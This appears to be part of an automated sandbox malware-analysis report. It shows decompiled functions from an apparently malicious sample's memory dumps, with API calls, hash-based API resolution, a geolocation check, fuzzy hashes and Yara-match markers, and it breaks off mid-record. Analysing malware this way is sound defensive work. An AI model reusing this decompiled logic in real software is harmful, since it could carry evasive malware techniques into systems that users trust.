                                                  Function 00408D87 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 294 408d87-408dd1 call 41faf7 call 4205e7 call 40c317 call 418a87 303 408dd3-408de5 PostThreadMessageW 294->303 304 408e05-408e09 294->304 305 408e04 303->305 306 408de7-408e01 call 40ba77 303->306 305->304 306->305
                                                  C-Code - Quality: 82%
                                                  			E00408D87(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041FAF7( &_v67, 0, 0x3f);
				E004205E7( &_v68, 3);
				_t12 = E0040C317(_t30, _a4 + 0x20,  &_v68); // executed
				_t13 = E00418A87(_a4 + 0x20, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040BA77(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                  0x00408d87
                                                  0x00408d96
                                                  0x00408d9a
                                                  0x00408da5
                                                  0x00408db5
                                                  0x00408dc5
                                                  0x00408dca
                                                  0x00408dd1
                                                  0x00408dd4
                                                  0x00408de1
                                                  0x00408de3
                                                  0x00408de5
                                                  0x00408e02
                                                  0x00408e02
                                                  0x00000000
                                                  0x00408e04
                                                  0x00408e09

                                                  APIs
                                                  • PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 00408DE1
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_hvbvmxm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessagePostThread
                                                  • String ID:
                                                  • API String ID: 1836367815-0
                                                  • Opcode ID: 6a5c76f33e69d631c5cd5faa055fa231827f6670659c0f58f240d0f59781fcbe
                                                  • Instruction ID: 3980c94b8ac149ca01037ed3d68c8fe9f93dea2d4a324d6a02d52aa73a4abf13
                                                  • Opcode Fuzzy Hash: 6a5c76f33e69d631c5cd5faa055fa231827f6670659c0f58f240d0f59781fcbe
                                                  • Instruction Fuzzy Hash: 1C018831A8022876E720A6959C43FFE765C5B41B59F04412EFF04FA1C1E6A8690686E9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041E1ED Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 309 41e1ed-41e1f6 310 41e1f8-41e21f call 41eb17 ExitProcess 309->310 311 41e24d-41e27f 309->311
                                                  C-Code - Quality: 100%
                                                  			E0041E1ED(void* __ebx, void* __ecx, void* __edx, void* __esi, void* _a4, void* _a12, void* _a16, void* _a20, void* _a24, void* _a28, void* _a32, void* _a36, void* _a40) {
				void* _v0;
				void* _v1;
				void* _t25;

				_t25 = __ebx + 1;
				if (_t25 != 0) goto L3;
			}






                                                  0x0041e1f3
                                                  0x0041e1f6

                                                  APIs
                                                  • ExitProcess.KERNEL32(?,00000000,000000E6,?,?,00000001), ref: 0041E21F
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_hvbvmxm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitProcess
                                                  • String ID:
                                                  • API String ID: 621844428-0
                                                  • Opcode ID: fe07c7a1fe7cc184691f729d252de3d8f94143cdc67c282ef1b5fd2a164ce06d
                                                  • Instruction ID: 3a23005c1a450b0ce9384711c7274ff542fa1110ee067af937f3c804ecebbb44
                                                  • Opcode Fuzzy Hash: fe07c7a1fe7cc184691f729d252de3d8f94143cdc67c282ef1b5fd2a164ce06d
                                                  • Instruction Fuzzy Hash: 470144B6200108ABCB14DF99DC84DEB77ACEF8C654F058259FA5D9B245C630E801CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041E388 Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 347 41e388-41e38f 348 41e391-41e3c1 call 41ebe7 347->348 349 41e339-41e34b LookupPrivilegeValueW 347->349
                                                  C-Code - Quality: 34%
                                                  			E0041E388(void* __eax, struct _LUID* __edx, void* __edi, intOrPtr _a5, intOrPtr _a9, WCHAR* _a12, WCHAR* _a16) {
				intOrPtr* __esi;
				int _t10;

				asm("sbb [0x6c5f1de9], ecx");
				if(__edi - 1 >= 0) {
					_t10 = LookupPrivilegeValueW(_a12, _a16, __edx); // executed
					return _t10;
				} else {
					__edx = __edx - 1;
					__esp = __esp + 1;
					asm("pushad");
					asm("fisub word [ecx]");
					_t3 = __eax;
					__eax = __ebp;
					__ebp = _t3;
					__ebp = __esp;
					__eax = _a5;
					__esi = _a5 + 0x1bf4;
					__eax = E0041EBE7(__eax, __esi,  *((intOrPtr*)(__eax + 0x23a4)), 2);
					__edx = _a9;
					__eax =  *__esi;
					__eax =  *((intOrPtr*)( *__esi))(_a9, __ebp);
					_pop(__esi);
					__ebp = __esi;
					return  *__esi;
				}
			}





                                                  0x0041e389
                                                  0x0041e38f
                                                  0x0041e347
                                                  0x0041e34b
                                                  0x0041e391
                                                  0x0041e391
                                                  0x0041e392
                                                  0x0041e393
                                                  0x0041e394
                                                  0x0041e396
                                                  0x0041e396
                                                  0x0041e396
                                                  0x0041e398
                                                  0x0041e39a
                                                  0x0041e3a7
                                                  0x0041e3af
                                                  0x0041e3b4
                                                  0x0041e3b7
                                                  0x0041e3bd
                                                  0x0041e3bf
                                                  0x0041e3c0
                                                  0x0041e3c1
                                                  0x0041e3c1

                                                  APIs
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040F389,0040F389,?,00000000,?,?), ref: 0041E347
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_hvbvmxm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LookupPrivilegeValue
                                                  • String ID:
                                                  • API String ID: 3899507212-0
                                                  • Opcode ID: 9ed70f12ad27d53b096bd0f9a4e238804728527f94b575bc47a36bf1a0f4018d
                                                  • Instruction ID: 4716ddf173ef1f5294d4de290b384ef1d893ae9b9691d9ddf83f7a3629dea316
                                                  • Opcode Fuzzy Hash: 9ed70f12ad27d53b096bd0f9a4e238804728527f94b575bc47a36bf1a0f4018d
                                                  • Instruction Fuzzy Hash: 6FF05EB5600214AFCB04DFA9DC45CE7776CEF85368B01846AFD598B642E632E911CBE4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041E177 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0041E177(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;

				E0041EB17( *((intOrPtr*)(_a4 + 0x14)), _a4, _t7 + 0xc94,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                  0x0041e18e
                                                  0x0041e1a4
                                                  0x0041e1a8

                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(0041813D,?,004188E4,004188E4,?,0041813D,?,?,?,?,?,00000000,00000005,00000206), ref: 0041E1A4
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_hvbvmxm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: 71d30878ffc0fd6371cee718eb9878eb3463dfa7e001799ef66c66478ee65a27
                                                  • Instruction ID: 39b5cabef950e6491fd1ff11e6bcb4f47bb735b4b1560f452d24bb2e9d3c42ad
                                                  • Opcode Fuzzy Hash: 71d30878ffc0fd6371cee718eb9878eb3463dfa7e001799ef66c66478ee65a27
                                                  • Instruction Fuzzy Hash: 83E046B5200218ABDB18EF9ADC45EE737ACEF88764F018159FE095B242C630F910CBB0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041E1B7 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0041E1B7(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;

				_t3 = _a4 + 0xc98; // 0xc98
				E0041EB17( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                  0x0041e1c6
                                                  0x0041e1ce
                                                  0x0041e1e4
                                                  0x0041e1e8

                                                  APIs
                                                  • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 0041E1E4
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_hvbvmxm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: 7383604f3fe5c795b9236c36b71377a732ea8f0b598dae172b24566b996ec6fa
                                                  • Instruction ID: 1d552643a1b6a9e7e8cbaa6fd288b4534f8ea2684dbb839d41cd3eb30db23803
                                                  • Opcode Fuzzy Hash: 7383604f3fe5c795b9236c36b71377a732ea8f0b598dae172b24566b996ec6fa
                                                  • Instruction Fuzzy Hash: 83E04FB52002146BD714DF49DC49ED737ACEF88754F014155FD0957241D630F914CBB0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041E317 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0041E317(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				struct _LUID* _t13;

				E0041EB17( *((intOrPtr*)(_a4 + 0xa1c)), _a4, _t7 + 0xcb0,  *((intOrPtr*)(_a4 + 0xa1c)), 0, 0x46);
				_t13 = _a16;
				_t10 = LookupPrivilegeValueW(_a8, _a12, _t13); // executed
				return _t10;
			}





                                                  0x0041e331
                                                  0x0041e336
                                                  0x0041e347
                                                  0x0041e34b

                                                  APIs
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040F389,0040F389,?,00000000,?,?), ref: 0041E347
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_hvbvmxm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LookupPrivilegeValue
                                                  • String ID:
                                                  • API String ID: 3899507212-0
                                                  • Opcode ID: 6915fa93d7270e13bfd703e99c47af289f1ee2615e020f739a89d4d612532f61
                                                  • Instruction ID: fb85849f582dcab3273909ea3b6beb81fed045dfd13ab71d80f81a5ef931559d
                                                  • Opcode Fuzzy Hash: 6915fa93d7270e13bfd703e99c47af289f1ee2615e020f739a89d4d612532f61
                                                  • Instruction Fuzzy Hash: 04E01AB52002186BD710DF49DC45EE737ADAF89664F118159BE0957241D631F8108AB5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040F537 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 37%
                                                  			E0040F537(intOrPtr _a4) {
				intOrPtr* _t7;
				void* _t8;

				_t7 = E00418A87(_a4 + 0x20,  *((intOrPtr*)(_a4 + 0xbc4)), 0, 0, 0x998e91b2);
				if(_t7 != 0) {
					_t8 =  *_t7(0x10); // executed
					return 0 | _t8 == 0x000000f1;
				} else {
					return _t7;
				}
			}





                                                  0x0040f551
                                                  0x0040f55b
                                                  0x0040f561
                                                  0x0040f570
                                                  0x0040f55e
                                                  0x0040f55e
                                                  0x0040f55e

                                                  APIs
                                                  • GetUserGeoID.KERNELBASE(00000010), ref: 0040F561
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_hvbvmxm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: User
                                                  • String ID:
                                                  • API String ID: 765557111-0
                                                  • Opcode ID: 192d1dc557fdcd1f2abf0cd98871ab39a043c43d1ecbfc7256f5f81224423b0b
                                                  • Instruction ID: 5511db123bae7081b5c05f1d5b2e2ca497d436f1bbdd44a9c892e0a4e36ad1e7
                                                  • Opcode Fuzzy Hash: 192d1dc557fdcd1f2abf0cd98871ab39a043c43d1ecbfc7256f5f81224423b0b
                                                  • Instruction Fuzzy Hash: 2FE0C23328030827F624E5A98C52FA6328E5B84B04F088475F90CE72C2D5A9E5800024
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041E1F7 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ExitProcess.KERNEL32(?,00000000,000000E6,?,?,00000001), ref: 0041E21F
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_hvbvmxm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitProcess
                                                  • String ID:
                                                  • API String ID: 621844428-0
                                                  • Opcode ID: 0c6232b6cdbf6635767260dc15682acedaa1cab9f782f361699728f7b20cdda3
                                                  • Instruction ID: 71b31a6e052b90d658ead73e1ea1e15e08fcd2b9b7f1fc59455b7fbc18c8b61a
                                                  • Opcode Fuzzy Hash: 0c6232b6cdbf6635767260dc15682acedaa1cab9f782f361699728f7b20cdda3
                                                  • Instruction Fuzzy Hash: 15D0C2313002187BC620DB89CC45FD3379CDF457A4F004065BA0C5B241C530BA00C7E0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 17181f3507c279752791e2aa22471a758bd41098e7ddf648eac0a54202aed8b0
                                                  • Instruction ID: fd774d3b0bc61d3a7aa453021c1500bd91abd8bee620a0c201bc48005ce4c1ae
                                                  • Opcode Fuzzy Hash: 17181f3507c279752791e2aa22471a758bd41098e7ddf648eac0a54202aed8b0
                                                  • Instruction Fuzzy Hash: 6DB09B729014C5C5E751D7E146087277E40BBD0741F16C065E2034645A4778C491F5B6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 00AE6A60 Relevance: .2, Instructions: 227COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 66%
                                                  			E00AE6A60(intOrPtr* _a4) {
				signed int _v8;
				char _v24;
				signed char _v25;
				intOrPtr* _v32;
				signed char _v36;
				signed int _v40;
				intOrPtr* _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr* _v68;
				signed char _v72;
				signed char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				signed char _v88;
				signed int _v92;
				signed char _v96;
				char _v100;
				signed int _v104;
				void* _v116;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t101;
				void* _t105;
				signed int _t112;
				signed int* _t113;
				signed int* _t114;
				intOrPtr _t117;
				intOrPtr _t118;
				void* _t122;
				signed int _t127;
				intOrPtr* _t128;
				signed int _t131;
				signed char _t134;
				signed int _t136;
				intOrPtr* _t138;
				intOrPtr* _t139;
				intOrPtr _t143;
				signed char _t144;
				signed short _t145;
				signed char _t146;
				intOrPtr* _t147;
				intOrPtr _t148;
				void* _t150;
				char _t152;
				signed int _t153;
				signed char _t154;

				_v8 =  *0xbad360 ^ _t153;
				_t144 =  *0x7ffe03c6;
				_v25 = _t144;
				_t128 = _a4;
				_v44 = _t128;
				if((_t144 & 0x00000001) == 0) {
					L54:
					_push(0);
					_push( &_v100);
					E00AF9810();
					 *_t128 = _v100;
					 *(_t128 + 4) = _v96;
					goto L20;
				} else {
					do {
						_t148 =  *0x7ffe03b8;
						_t134 =  *0x7FFE03BC;
						_t146 =  *0x7FFE03BC;
						_v60 = _t148;
						_v76 = _t134;
					} while (_t148 !=  *0x7ffe03b8 || _t134 != _t146);
					_t128 = _v44;
					if((_t144 & 0x00000002) != 0) {
						_t147 =  *0xba6908; // 0x0
						_v68 = _t147;
						if(_t147 == 0) {
							goto L54;
						} else {
							goto L22;
						}
						while(1) {
							L22:
							_t101 =  *_t147;
							_v32 = _t101;
							if(_t101 == 0) {
								break;
							}
							if(_t144 >= 0) {
								if((_t144 & 0x00000020) == 0) {
									if((_t144 & 0x00000010) != 0) {
										asm("mfence");
									}
								} else {
									asm("lfence");
								}
								asm("rdtsc");
							} else {
								asm("rdtscp");
								_v72 = _t134;
							}
							_v52 = _t101;
							_v84 =  *((intOrPtr*)(_t147 + 8));
							_v64 =  *((intOrPtr*)(_t147 + 0x10));
							_v80 =  *((intOrPtr*)(_t147 + 0x14));
							_t105 = E00AFCF90(_t144, 0,  *((intOrPtr*)(_t147 + 0xc)), 0);
							_t146 = _t144;
							E00AFCF90(_v52, 0,  *((intOrPtr*)(_t147 + 0xc)), 0);
							_t150 = _t105 + _t144;
							_t144 = _v25;
							asm("adc edi, 0x0");
							_v40 = _t150 + _v64;
							_t147 = _v68;
							asm("adc edi, [ebp-0x4c]");
							_v36 = _t146;
							if( *_t147 != _v32) {
								continue;
							} else {
								_t128 = _v44;
								_t147 = _v60;
								L19:
								_t144 = _v36;
								asm("adc edx, [ebp-0x48]");
								 *_t128 = E00AFD340(_v40 + _t147,  *0x7ffe03c7 & 0x000000ff, _t144);
								 *(_t128 + 4) = _t144;
								L20:
								return E00AFB640(1, _t128, _v8 ^ _t153, _t144, _t146, _t147);
							}
						}
						_t128 = _v44;
						goto L54;
					}
					_v56 = 0xffffffff;
					if( *((intOrPtr*)( *[fs:0x18] + 0xfdc)) == 0) {
						_t136 = 0x14c;
						L14:
						_t112 = _t136 & 0x0000ffff;
						L15:
						if(_t112 == 0xaa64) {
							_t113 =  &_v40;
							_v32 = _t113;
							_t138 = _v32;
							asm("int 0x81");
							 *_t138 = _t113;
							 *(_t138 + 4) = _t144;
							if((_t144 & 0x00000040) == 0) {
								goto L19;
							}
							_t114 =  &_v92;
							_v32 = _t114;
							_t139 = _v32;
							asm("int 0x81");
							 *_t139 = _t114;
							 *(_t139 + 4) = _t144;
							_t144 = _v88;
							if(((_t144 ^ _v36) & 0x00000001) != 0) {
								goto L19;
							}
							_t112 = _v92;
							L18:
							_v40 = _t112;
							_v36 = _t144;
							goto L19;
						}
						if(_t144 >= 0) {
							if((_t144 & 0x00000020) == 0) {
								if((_t144 & 0x00000010) != 0) {
									asm("mfence");
								}
							} else {
								asm("lfence");
							}
							asm("rdtsc");
						} else {
							asm("rdtscp");
						}
						goto L18;
					}
					_t117 =  *[fs:0x18];
					_t143 =  *((intOrPtr*)(_t117 + 0xfdc));
					if(_t143 < 0) {
						_t117 = _t117 + _t143;
					}
					if(_t117 ==  *((intOrPtr*)(_t117 + 0x18))) {
						_t118 =  *((intOrPtr*)(_t117 + 0xe38));
					} else {
						_t118 =  *((intOrPtr*)(_t117 + 0x14d0));
					}
					if(_t118 == 0 ||  *((short*)(_t118 + 0x22)) == 0) {
						L34:
						_v48 = 0x10;
						_push( &_v48);
						_push(0x10);
						_t146 =  &_v24;
						_push(_t146);
						_push(4);
						_push( &_v56);
						_push(0xb5);
						_t122 = E00AFAA90();
						if(_t122 == 0xc0000023) {
							_t152 = _v48;
							E00AFD000(_t152);
							_t146 = _t154;
							_push( &_v48);
							_push(_t152);
							_push(_t146);
							_push(4);
							_push( &_v56);
							_push(0xb5);
							_t122 = E00AFAA90();
							_t147 = _v60;
						}
						if(_t122 < 0) {
							_t112 = _v104;
							_t144 = _v25;
							goto L15;
						} else {
							_t145 =  *_t146;
							_t136 = 0;
							if(_t145 == 0) {
								L43:
								_t144 = _v25;
								goto L14;
							}
							_t131 = 0;
							do {
								if((_t145 & 0x00040000) != 0) {
									_t136 = _t145 & 0x0000ffff;
								}
								_t145 =  *(_t146 + 4 + _t131 * 4);
								_t131 = _t131 + 1;
							} while (_t145 != 0);
							_t128 = _v44;
							goto L43;
						}
					} else {
						_t127 =  *(_t118 + 0x20) & 0x0000ffff;
						if(_t127 == 0) {
							goto L34;
						}
						_t136 = _t127;
						goto L14;
					}
				}
			}






















































                                                  0x00ae6a6f
                                                  0x00ae6a72
                                                  0x00ae6a78
                                                  0x00ae6a7c
                                                  0x00ae6a7f
                                                  0x00ae6a87
                                                  0x00b28049
                                                  0x00b28049
                                                  0x00b2804e
                                                  0x00b2804f
                                                  0x00b28057
                                                  0x00b2805c
                                                  0x00000000
                                                  0x00ae6a8d
                                                  0x00ae6a92
                                                  0x00ae6a92
                                                  0x00ae6a94
                                                  0x00ae6a99
                                                  0x00ae6a9c
                                                  0x00ae6a9f
                                                  0x00ae6aa2
                                                  0x00ae6aaa
                                                  0x00ae6ab0
                                                  0x00b27eae
                                                  0x00b27eb4
                                                  0x00b27eb9
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00b27ebf
                                                  0x00b27ebf
                                                  0x00b27ebf
                                                  0x00b27ec1
                                                  0x00b27ec6
                                                  0x00000000
                                                  0x00000000
                                                  0x00b27ece
                                                  0x00b27edb
                                                  0x00b27ee5
                                                  0x00b27ee7
                                                  0x00b27ee7
                                                  0x00b27edd
                                                  0x00b27edd
                                                  0x00b27edd
                                                  0x00b27eea
                                                  0x00b27ed0
                                                  0x00b27ed0
                                                  0x00b27ed3
                                                  0x00b27ed3
                                                  0x00b27eec
                                                  0x00b27ef8
                                                  0x00b27f00
                                                  0x00b27f07
                                                  0x00b27f0a
                                                  0x00b27f19
                                                  0x00b27f1b
                                                  0x00b27f23
                                                  0x00b27f25
                                                  0x00b27f28
                                                  0x00b27f2e
                                                  0x00b27f31
                                                  0x00b27f34
                                                  0x00b27f37
                                                  0x00b27f3c
                                                  0x00000000
                                                  0x00b27f3e
                                                  0x00b27f3e
                                                  0x00b27f41
                                                  0x00ae6b35
                                                  0x00ae6b38
                                                  0x00ae6b44
                                                  0x00ae6b4c
                                                  0x00ae6b4e
                                                  0x00ae6b51
                                                  0x00ae6b69
                                                  0x00ae6b69
                                                  0x00b27f3c
                                                  0x00b28046
                                                  0x00000000
                                                  0x00b28046
                                                  0x00ae6abc
                                                  0x00ae6aca
                                                  0x00b27f49
                                                  0x00ae6b13
                                                  0x00ae6b13
                                                  0x00ae6b16
                                                  0x00ae6b1e
                                                  0x00b27fe7
                                                  0x00b27fea
                                                  0x00b27fed
                                                  0x00b27ff0
                                                  0x00b27ff2
                                                  0x00b27ff4
                                                  0x00b27ffa
                                                  0x00000000
                                                  0x00000000
                                                  0x00b28000
                                                  0x00b28003
                                                  0x00b28006
                                                  0x00b28009
                                                  0x00b2800b
                                                  0x00b2800d
                                                  0x00b28010
                                                  0x00b2801f
                                                  0x00000000
                                                  0x00000000
                                                  0x00b28025
                                                  0x00ae6b2f
                                                  0x00ae6b2f
                                                  0x00ae6b32
                                                  0x00000000
                                                  0x00ae6b32
                                                  0x00ae6b26
                                                  0x00b28030
                                                  0x00b2803a
                                                  0x00b2803c
                                                  0x00b2803c
                                                  0x00b28032
                                                  0x00b28032
                                                  0x00b28032
                                                  0x00b2803f
                                                  0x00ae6b2c
                                                  0x00ae6b2c
                                                  0x00ae6b2c
                                                  0x00000000
                                                  0x00ae6b26
                                                  0x00ae6ad0
                                                  0x00ae6ad6
                                                  0x00ae6ade
                                                  0x00ae6ae0
                                                  0x00ae6ae0
                                                  0x00ae6ae5
                                                  0x00b27f53
                                                  0x00ae6aeb
                                                  0x00ae6aeb
                                                  0x00ae6aeb
                                                  0x00ae6af3
                                                  0x00b27f5e
                                                  0x00b27f61
                                                  0x00b27f68
                                                  0x00b27f69
                                                  0x00b27f6b
                                                  0x00b27f70
                                                  0x00b27f71
                                                  0x00b27f76
                                                  0x00b27f77
                                                  0x00b27f7c
                                                  0x00b27f86
                                                  0x00b27f88
                                                  0x00b27f8d
                                                  0x00b27f92
                                                  0x00b27f97
                                                  0x00b27f98
                                                  0x00b27f99
                                                  0x00b27f9a
                                                  0x00b27f9f
                                                  0x00b27fa0
                                                  0x00b27fa5
                                                  0x00b27faa
                                                  0x00b27faa
                                                  0x00b27faf
                                                  0x00b27fdc
                                                  0x00b27fdf
                                                  0x00000000
                                                  0x00b27fb1
                                                  0x00b27fb1
                                                  0x00b27fb3
                                                  0x00b27fb8
                                                  0x00b27fd4
                                                  0x00b27fd4
                                                  0x00000000
                                                  0x00b27fd4
                                                  0x00b27fba
                                                  0x00b27fbc
                                                  0x00b27fc2
                                                  0x00b27fc4
                                                  0x00b27fc4
                                                  0x00b27fc7
                                                  0x00b27fcb
                                                  0x00b27fcc
                                                  0x00b27fd1
                                                  0x00000000
                                                  0x00b27fd1
                                                  0x00ae6b04
                                                  0x00ae6b04
                                                  0x00ae6b0b
                                                  0x00000000
                                                  0x00000000
                                                  0x00ae6b11
                                                  0x00000000
                                                  0x00ae6b11
                                                  0x00ae6af3

                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8d4bf0e0b0c2cad305c4a911d5bdf81bbba6727cb70eea3b7a67e71bbcc94052
                                                  • Instruction ID: 312871a65d2b78773a4b3c6c913d64b3d6df58c572204725ce4c2b92a75a6df6
                                                  • Opcode Fuzzy Hash: 8d4bf0e0b0c2cad305c4a911d5bdf81bbba6727cb70eea3b7a67e71bbcc94052
                                                  • Instruction Fuzzy Hash: 4C81AE71E442699FCB10CF99D981BEEBBF5EF18340F1480A9E948EB241D735AC05CBA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF98A0 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2bfb3a8bc5bc544f646085f5ce936838645f9ac4addc631e4942f5700ca285c0
                                                  • Instruction ID: faece846fb01eb6975ba040edea2855791addd639896342270ecce2c82bcfbb4
                                                  • Opcode Fuzzy Hash: 2bfb3a8bc5bc544f646085f5ce936838645f9ac4addc631e4942f5700ca285c0
                                                  • Instruction Fuzzy Hash: 9D90026230100402E212619944146060449D7D1385F91C066E142455DD86A58963F172
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF9820 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 05628f6f88a0ad9cfbec20fcd8d854287109354aef3bb07ea65a995a2bbd8444
                                                  • Instruction ID: 7d1b735a22a5b19649e6f154ef82d6e7de2103ddc7700c1ff13656aa99959475
